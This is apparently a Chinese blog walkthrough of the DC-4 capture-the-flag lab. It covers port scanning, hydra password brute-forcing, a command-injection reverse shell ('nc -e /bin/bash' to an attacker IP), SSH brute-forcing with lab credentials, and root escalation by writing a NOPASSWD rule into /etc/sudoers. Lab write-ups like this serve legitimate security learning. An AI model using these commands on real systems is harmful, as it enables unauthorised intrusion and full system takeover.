靶机:DC-4

一、信息收集

1、主机发现

复制代码
nmap 192.168.236.0/24

2、端口扫描

复制代码
nmap 192.168.236.175 -p- -A

3、目录扫描

复制代码
dirb http://192.168.236.175

二、漏洞探测

访问80端口,发现登录页面

尝试爆破密码

复制代码
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.236.175 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

http-post-form:指定使用 HTTP POST 请求方式。
"/login.php:username=^USER^&password=^PASS^:S=logout":指定登录页面地址 /login.php,并使用 username 和 password 作为参数名来传递用户名和密码。其中 ^USER^ 和 ^PASS^ 含义为在暴力破解过程之中将要用到的用户名和密码,而 :S=logout 则是指当程序返回值为 logout 时,认为破解成功并退出程序。
-F:如果成功的话,停止猜测其他密码。

登录

复制代码
admin:happy

bp抓包,是命令执行

查看 /etc/passwd 文件

三、GetShell

反弹shell

复制代码
radio=nc+-e/bin/bash+192.168.236.137+4444&submit=Run
nc -lvvp 4444

四、提权

切换为交互式shell

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l 看一下,不知道密码

在 jim 用户下发现密码文件

下载到本地

复制代码
python3 -m http.server
wget http://192.168.236.175:8000/old-passwords.bak

使用 hydra 破解

复制代码
hydra -L users.txt -P old-passwords.bak ssh://192.168.236.175

jim:jibril04

ssh 连接

复制代码
ssh jim@192.168.236.175

在 /var/mail 下有一封信,发现 charles 用户的密码

复制代码
charles:^xHhA&hvim0y

切换用户

查看具有 root 权限的命令

复制代码
sudo -l

teehee是个小众的linux编辑器,执行以下命令,成功提权

复制代码
echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
sudo su

查看flag

相关推荐
网安INF2 小时前
【论文阅读】-《HopSkipJumpAttack: A Query-Efficient Decision-Based Attack》
论文阅读·人工智能·深度学习·网络安全·对抗攻击
lingggggaaaa21 小时前
小迪安全v2023学习笔记(六十二讲)—— PHP框架反序列化
笔记·学习·安全·web安全·网络安全·php·反序列化
Johny_Zhao1 天前
基于 Docker 的 LLaMA-Factory 全流程部署指南
linux·网络·网络安全·信息安全·kubernetes·云计算·containerd·yum源·系统运维·llama-factory
黑客影儿1 天前
Kali Linux 环境中的系统配置文件与用户配置文件大全
linux·运维·程序人生·安全·网络安全·系统安全·学习方法
小张的博客之旅1 天前
宁波市第八届网络安全大赛初赛(REVERSE-Writeup)
学习·网络安全·reverse
athink_cn2 天前
HTTP/2新型漏洞“MadeYouReset“曝光:可发动大规模DoS攻击
网络·网络协议·安全·http·网络安全
小韩博2 天前
metasploit 框架安装更新遇到无法下载问题如何解决
linux·网络安全·公钥·下载失败
合作小小程序员小小店2 天前
SDN安全开发环境中常见的框架,工具,第三方库,mininet常见指令介绍
python·安全·生成对抗网络·网络安全·网络攻击模型
Whoami!3 天前
2-3〔O҉S҉C҉P҉ ◈ 研记〕❘ 漏洞扫描▸AppScan(WEB扫描)
网络安全·信息安全·appscan·oscp
Bruce_Liuxiaowei4 天前
跨站脚本攻击(XSS)高级绕过技术与防御方案
前端·网络安全·xss